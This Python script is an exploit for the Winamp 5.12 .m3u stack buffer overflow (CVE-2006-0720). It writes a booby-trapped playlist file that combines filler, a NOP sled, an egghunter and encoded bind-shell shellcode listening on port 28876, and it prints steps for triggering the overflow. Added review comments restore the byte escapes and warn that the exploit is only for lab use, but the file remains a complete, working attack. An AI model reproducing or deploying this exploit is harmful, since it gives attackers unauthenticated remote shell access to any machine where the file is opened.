
# Title : Winamp 5.12 (.m3u) - Stack Based Buffer Overflow
# Published : 2013-06-17
# Author :


# Exploit Title: Winamp 5.12 .m3u stack based buffer overflow
# Date: 16 June 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.winamp.com/
# Software Link: http://www.oldapps.com/winamp.php?old_winamp=211
# Version: 5.12
# Tested on: Windows XP Professional SP2, English
# CVE: CVE-2006-0720
# BID: 16785
#
# Description from CVE-2006-0720
# Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13 
# allows user-assisted attackers to cause a denial of service 
# (crash) and possibly execute arbitrary code via a crafted 
# .m3u file that causes an incorrect strncpy function call 
# when the player pauses or stops the file.
#
#
# 1. Launch Winamp
# 2. Drag boom.m3u into Winamp window 
# 3. Check for bind shell on port 28876
#

import struct

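# NOTE(review): the original listing had every backslash stripped ("x90",
# "EXTM3Un"), so it emitted ASCII text rather than the intended bytes and
# could never trigger the overflow. Escapes are restored below and all
# payload pieces are bytes, written in binary mode.

# Extended-M3U header. The overflow is in the entry (path) line that
# follows, so the header only needs to look like a valid playlist.
header = b"#EXTM3U\n"
header += b"#EXTINF:1234,Pwnage Rock\n"

# skape's 32-byte NtDisplayString egghunter, padded with NOPs on both sides.
# It walks memory page by page looking for the 8-byte tag "w00tw00t" and
# jumps to the bytes right after it, so the bind shell does not have to sit
# at a fixed offset in the overflowing buffer. The int 0x2e syscall number
# (0x43) is OS-version specific; it matches the XP SP2 test target only.
egghunter = (
    b"\x90" * 64 +
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x43\x58" +  # or dx,0xfff; inc edx; push edx; push 0x43; pop eax
    b"\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" +          # int 0x2e; cmp al,5; pop edx; je (next page); mov eax,
    b"\x77\x30\x30\x74" +                          #   "w00t" -- the egg, searched for twice in a row
    b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" +  # mov edi,edx; scasd; jne; scasd; jne; jmp edi
    b"\x90" * 30
)

# 262 bytes of filler, a 100-byte NOP sled and then the egghunter. The
# `call ecx` gadget below presumably lands somewhere in this sled -- the
# exact register state was found by the author's fuzzer; confirm in a
# debugger before porting to another build.
junk = b"A" * 262 + b"\x90" * 100 + egghunter

# Bind shell on TCP port 28876, taken from
# https://code.google.com/p/w32-bind-ngs-shellcode/ and encoded with
#   msfencode -i w32-bind-ngs-shellcode.bin -b "\x00\x0a\x0d\x5c"
#   [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
# The blob is opaque once encoded: decode/step it in a debugger before
# trusting it with anything other than a throwaway lab VM. A bind shell is
# unauthenticated -- anyone who can reach port 28876 on the target gets the
# shell, so only run this on an isolated network. The "w00tw00t" tag in
# front is what the egghunter searches for.
shellcode = (
    b"w00tw00t" + b"\x90" * 239 +
    b"\xbf\x26\x63\xb2\x20\xda\xcc\xd9\x74\x24\xf4\x5a\x33\xc9" +
    b"\xb1\x36\x83\xea\xfc\x31\x7a\x10\x03\x7a\x10\xc4\x96\x83" +
    b"\xe9\x6c\xd2\x95\xd9\xe7\x92\x59\x91\x81\x46\xe9\xcb\x65" +
    b"\xfc\x93\x33\xfe\x34\x54\x7b\x18\x4c\x57\xd2\x70\x9c\xc8" +
    b"\xe6\xb2\x88\x90\x5e\xc5\x3b\x35\xe8\xa6\xb5\x5d\x9f\x5e" +
    b"\x70\x5e\x89\x52\x52\xad\x40\x8d\x73\xde\xf9\x10\x2d\x60" +
    b"\xaf\xc5\x9c\xe1\xa0\xc5\xba\xa9\xb5\x48\xff\xbe\x96\x6f" +
    b"\x87\xc1\xcd\x04\x3c\xe2\x10\xf3\x95\xd3\xc0\x41\x91\x20" +
    b"\x74\x44\x4b\xfc\x40\xea\xa7\x8c\x84\x36\xfb\x1f\xa0\x41" +
    b"\x3e\xc7\x3f\x46\x61\x8c\x8b\xbc\x9f\x7b\x04\x0b\x8b\x2a" +
    b"\x90\x38\xa8\xcd\x4f\x37\x38\xce\x8b\xd6\x12\x51\xad\xd1" +
    b"\x11\x5a\x5f\xbf\xdd\x09\xa0\xef\x89\x38\xde\x31\x45\x36" +
    b"\x6e\x13\x04\x47\x40\x06\xa9\x68\xf4\xd9\x79\x77\x08\x56" +
    b"\xb6\xed\xe7\x3f\x14\xa4\xf8\x6f\xe3\x87\x73\x77\xdd\xd5" +
    b"\x2e\xef\x7d\xb7\xaa\xcf\x0c\x3b\x17\x37\xa4\x6f\xfc\x81" +
    b"\xfd\x86\x02\x59\x85\x65\x21\x36\xdb\xc7\x7b\x7e\x9c\x08" +
    b"\x73\x29\x71\x85\xd3\x87\x8a\x7f\x38\xac\x33\x7c\x29\x78" +
    b"\x44\x83\x55"
)

# 0x022B368C : call ecx, in C:\Program Files\Winamp\pxsdkpls.dll.
# Hard-coded address from the tested install (Winamp 5.12 on XP SP2,
# English); any other Winamp build or OS needs the gadget re-found.
ret = struct.pack("<I", 0x022B368C)

# Author's note: EIP does not get overwritten and Winamp crashes differently
# unless the 4th byte after ret is 0xB0. There is probably a cleaner
# explanation, but this is what the fuzzer found first, so it stays.
wtf = b"\x43\x43\x43\xB0"


def build_payload():
    """Return the complete contents of boom.m3u as bytes.

    Layout: M3U header, then one entry line made of filler + NOP sled +
    egghunter + tagged bind shell, terminated by the `call ecx` gadget and
    the 0xB0 trailer.
    """
    return header + junk + shellcode + ret + wtf


def main():
    """Write boom.m3u to the current directory and print the usage steps."""
    # Binary mode: no platform newline translation may touch the payload.
    with open("boom.m3u", "wb") as f:
        f.write(build_payload())

    print("Created boom.m3u")
    print("1. Open Winamp")
    print("2. Drag boom.m3u into Winamp window")
    print("3. Check for bind shell on port 28876")


if __name__ == "__main__":
    main()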